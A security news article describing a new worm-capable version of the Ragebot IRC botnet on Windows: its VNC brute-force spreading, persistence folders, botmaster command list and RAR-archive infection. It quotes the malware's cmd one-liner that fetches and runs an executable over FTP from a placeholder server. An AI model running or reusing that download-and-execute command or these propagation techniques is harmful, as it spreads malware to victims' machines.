An unknown group/person is building a botnet using a new version of the Ragebot botnet malware, one that includes worm features that allow it to spread on its own to new devices.
The Ragebot malware came to light in April 2015, when Zscaler researchers published a blog post about new botnet malware families that still relied on IRC channels to control infected hosts, a technique that many consider rudimentary and inefficient
Since its discovery, it appears that someone has spent some time working on the Ragebot code and has returned with a new version.
According to Russian antivirus maker Dr.Web, a new version of the Ragebot malware is currently spreading in the wild.
Compared to the old version, this one doesn't necessarily need its author to infect each and every one of its targets, but relies on a worm component that does some of the work for him.
This Ragebot worm version only targets Windows computers. Malware researchers say that once it infects a victim, Ragebot runs a command on each host:
cmd /c echo open ftp.yourserver.com 21 >> ik &echo user USERNAME PASSWORD >> ik &echo binary >> ik &echo get EXENAME.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &EXENAME.exe &exit
This command opens a local FTP connection to a remote server from where it downloads and runs an executable.
This executable is a scanner that will look for internal subnetworks and identify hosts with connections open on port 5900, used for Virtual Network Computing (VNC) remote desktop connections.
Ragebot will then use a list of 296 passwords to brute-force the remote computer's password. If it succeeds, the worm goes back to the beginning by running the same command and downloading the VNC scanner on a new host.
To gain persistence on infected hosts, Ragebot also copies itself to multiple local folders, for ICQ and P2P clients. These are the folders where Ragebot saves itself:
\Program Files\LimeWire\Shared \Program Files\eDonkey2000\incoming \Program Files\KAZAA \Program Files\Morpheus\My Shared Folder\ \Program Files\BearShare\Shared\ \Program Files\ICQ\Shared Files\ \Program Files\Grokster\My Grokster\ \My Downloads\
At this point, Ragebot also registers with its command and control (C&C) server, which is an IRC channel.
Ragebot's author controls all hosts by typing commands in the main IRC window. The commands available to the Ragebot botmaster are as follows:
!commands – display information on received commands; !botinfo – display information about itself; !rarworm - infect RAR archives; !xpl – execute a brute force attack and infect VNC nodes; !p2p – infect P2P clients; !vncstop - stop scanning VNC hosts; !disconnect – break the connection; !reconnect – restore the connection; !restart – relaunch itself; !part – leave the specified chat channels; !join – connect to the IRC channel; !b0tk1ller – kill processes according to the list; !nick – name the Trojan on the IRC channel; !h< password > – remove or download an executable file (where password is an authorization password).
Two more functions are also included with this new Ragebot version. The first is an antivirus-like feature that blocks all processes and allows only whitelisted core system applications to run.
This self-protection system isn't anything new, since the Shifu banking trojan, discovered in August 2015, also includes a similar module.
The second new Ragebot feature is the ability to search for local RAR files and inject itself inside them. This behavior is most likely used as a secondary self-propagation system.
Users unzipping these archives would find an EXE file inside them and most likely run it, thinking it was clean. Ragebot uses generic names for these EXE files, such as setup.exe, installer.exe, self-installer.exe, and self-extractor.exe.
It's been a while since we've seen this type of behavior in Windows botnet malware, usually spread via spam and exploit kits. The readdition of worm-like features to botnet malware families comes after similar features were very successful in helping IoT malware propagate to millions of smart devices.